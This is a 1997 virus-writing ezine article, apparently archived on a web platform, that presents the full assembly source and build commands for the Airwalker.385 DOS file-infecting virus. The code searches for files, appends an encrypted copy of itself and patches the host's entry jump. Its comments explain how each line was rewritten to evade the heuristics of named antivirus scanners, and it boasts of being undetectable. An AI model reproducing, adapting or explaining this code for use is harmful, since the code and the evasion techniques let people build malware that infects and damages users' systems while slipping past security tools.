Copy Link
Add to Bookmark
Report

SLAM2.023: The Airwalker.385 Virus - Special SLAM Edition!

eZine's profile picture
Published in 
Slam
 · 2 years ago

================================================================= 
The Airwalker.385 Virus Written by Gothmog/[DHA97]
=================================================================


Assumes TASM v4.00 or v5.00 or A86 Macro Assembler v4.02; other assemblers may work, but are not personally tested or quality assured.

Assemble with: tasm /m2 airw-385.asm     (/m1 generates a 386 byte variant) 
tlink /t airw-385.obj


Alternately: a86 airw-385.asm airw-385.com (creates a 384 byte variant)

Payload: On each run, before returning control to the host program, the key contained at encrypt_key will be compared with a random byte taken from I/O port 40h (system timer). If the low bytes match, the host program will beep once, then continue normally. If the high bytes match, the virus will display its message from the SLAM virus team and transfer control to the host.

As of right now, the Airwalker.385 virus is 100% unscannable with:

  • TBAV v7.07 w/ high heuristic sensitivity enabled
  • F-PROT v2.26 w/ switches /ANALYSE /GURU /PARANOID enabled
  • AVPLite v3.0 build 107 updated 03/22/97 with full heuristics enabled
  • Dr. Solomon's FindVirus v7.69 w/ the following command-line switches
  • enabled: /!GURU /SECURE /VID /!IVN /!DOBOOTS /PACK /ANALYSE
  • Microsoft Anti-Virus (big surprise... no great accomplishment here :)


.model tiny 
.286
.code

org 0100h

start:
db 0E9h
dw offset virus_start - offset dummy_host

dummy_host:
mov ah, 09h
int 21h
int 20h

message db 'WARNING: You have just released the Airwalker.385 virus!', 0Dh, 0Ah, '$'

virus_start:
db 0BDh
delta_offset:
dw offset virus_start

; ===========================================================================
; F-Protect will flag this virus if the following code is included, but stops
; tracing immediately if a register is called, even if the /analyse /paranoid
; and /guru command-line switches are used.
;
; call decrypt
; ===========================================================================

lea ax, [bp + decrypt - virus_start]
call ax

start_encrypt:

; ===========================================================================
; AVP v3.0 build 107 update 03/22/97 will detect the following anti-heuristic
; code segment, but not if you xor a word on the stack:
;
; xor word ptr [bp + file_mask + 2 - virus_start], 1717h
; xor byte ptr [bp + file_mask + 4 - virus_start], 19h
; ===========================================================================

push word ptr [bp + file_mask + 2 - virus_start]
mov bx, sp
xor word ptr [bx], 1717h
pop word ptr [bp + file_mask + 2 - virus_start]
xor byte ptr [bp + file_mask + 4 - virus_start], 19h

; ===========================================================================
; O Found code that can be used to overwrite/move a program in memory.
;
; mov di, 0100h
; lea si, [bp + original - virus_start]
; ===========================================================================

mov si, 0100h
lea di, [bp + original - virus_start]
xchg si, di

movsw
movsb

mov ah, 1Ah
lea dx, [bp + virus_dta - virus_start]
int 21h

; ===========================================================================
; F Suspicious file access. Might be able to infect a file.
;
; mov ah, 4Eh
; lea dx, [bp + file_mask - virus_start]
; mov cx, 32
; int 21h
; ===========================================================================

mov bh, 4Eh
xchg ax, bx
lea dx, [bp + file_mask - virus_start]
mov cx, 32
int 21h

jnc open_again

return_to_host:

mov ax, word ptr [bp + encrypt_key - virus_start]
xchg al, bl
in al, 40h

cmp al, ah
je payload_beep

cmp al, bl
jne back_to_entry

payload_slam_message:
lea dx, [bp + slam_string - virus_start]
jmp display_string

payload_beep:
lea dx, [bp + beep_string - virus_start]

display_string:
mov ah, 09h
int 21h

back_to_entry:

; ===========================================================================
; B Back to entry point. Contains code to re-start the program after
; modifications at the entry-point are made. Very usual for viruses.
;
; mov si, 0100h
; push si
; ret
; ===========================================================================

dec sp
mov si, sp
mov word ptr [si], 0100h
xor ax, ax
xor bx, bx
xor cx, cx
cwd
xor bp, bp
xor si, si
xor di, di
ret

open_again:
mov ax, 3D02h
lea dx, [bp + name_buffer - virus_start]
int 21h
jc return_to_host

xchg bx, ax

mov ah, 3Fh
lea dx, [bp + original - virus_start]
mov cx, 03h
int 21h

jc return_to_host
push bx
mov bx, dx
cmp byte ptr [bx], 0E9h
pop bx

je find_next_file

mov ax, 4202h
xor cx, cx
cwd
int 21h
jc return_to_host

push ax

add ax, offset start
mov word ptr [bp + delta_offset - virus_start], ax

mov ah, 2Ch
int 21h
xchg ch, cl
add dx, cx
mov word ptr [bp + encrypt_key - virus_start], dx

xor word ptr [bp + file_mask + 2 - virus_start], 1717h
xor byte ptr [bp + file_mask + 4 - virus_start], 19h

mov ah, 40h
mov cx, virus_end - virus_start
lea dx, [bp + virus_start - virus_start]

pusha
jmp write_virus

out_write_virus:
pop ax
jc jump_up

sub ax, 03h
push bx
mov bx, bp
mov word ptr cs:[bx + 1], ax
mov byte ptr [bx], 0E9h

pop bx

mov ax, 4200h
xor cx, cx
cwd
int 21h
jc jump_up

; ===========================================================================
; F Suspicious file access. Might be able to infect a file.
;
; mov ah, 40h
; lea dx, [bp + virus_start - virus_start]
; mov cx, 03h
; int 21h
; jc return_to_host
; ===========================================================================

mov ax, 03h
mov ch, 40h
lea dx, [bp + virus_start - virus_start]
xchg ax, cx
int 21h
jc jump_up

mov ah, 3Eh
int 21h

jump_up:
jmp return_to_host

find_next_file:
mov ah, 3Eh
int 21h

lea dx, [bp + file_mask - virus_start]
mov ah, 4Fh
int 21h
jc jump_up
jmp open_again

original:
mov dx, offset message

virus_name db '[airwalker]', 00h
virus_author db '(c) 1997 gothmog', 00h

beep_string db 07h, '$'
slam_string db 'greetings to the world from the slam virus team', 0Dh, 0Ah, '$'

; ===========================================================================
; S Contains a routine to search for executable (.COM or .EXE) files.
;
; file_mask db '*.com', 00h
; ===========================================================================

file_mask db '*.txt', 00h

end_encrypt equ $ - 0001h

encrypt:
decrypt:
lea si, [bp + start_encrypt - virus_start]
mov di, si
mov cx, (end_encrypt - start_encrypt + 1) / 2

xor_loop:
lodsw
int 03h ; debugger trap
jnc false_jump

false_jump_2:
stosw
loop xor_loop
ret

false_jump:
db 35h

encrypt_key dw 0000

jnc false_jump_2

write_virus:
call encrypt
popa
int 21h
call decrypt
jmp out_write_virus

virus_end:

virus_dta db 30 dup (?)
name_buffer db 13 dup (?)

end start

; ============================================================[ code ends ]==

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT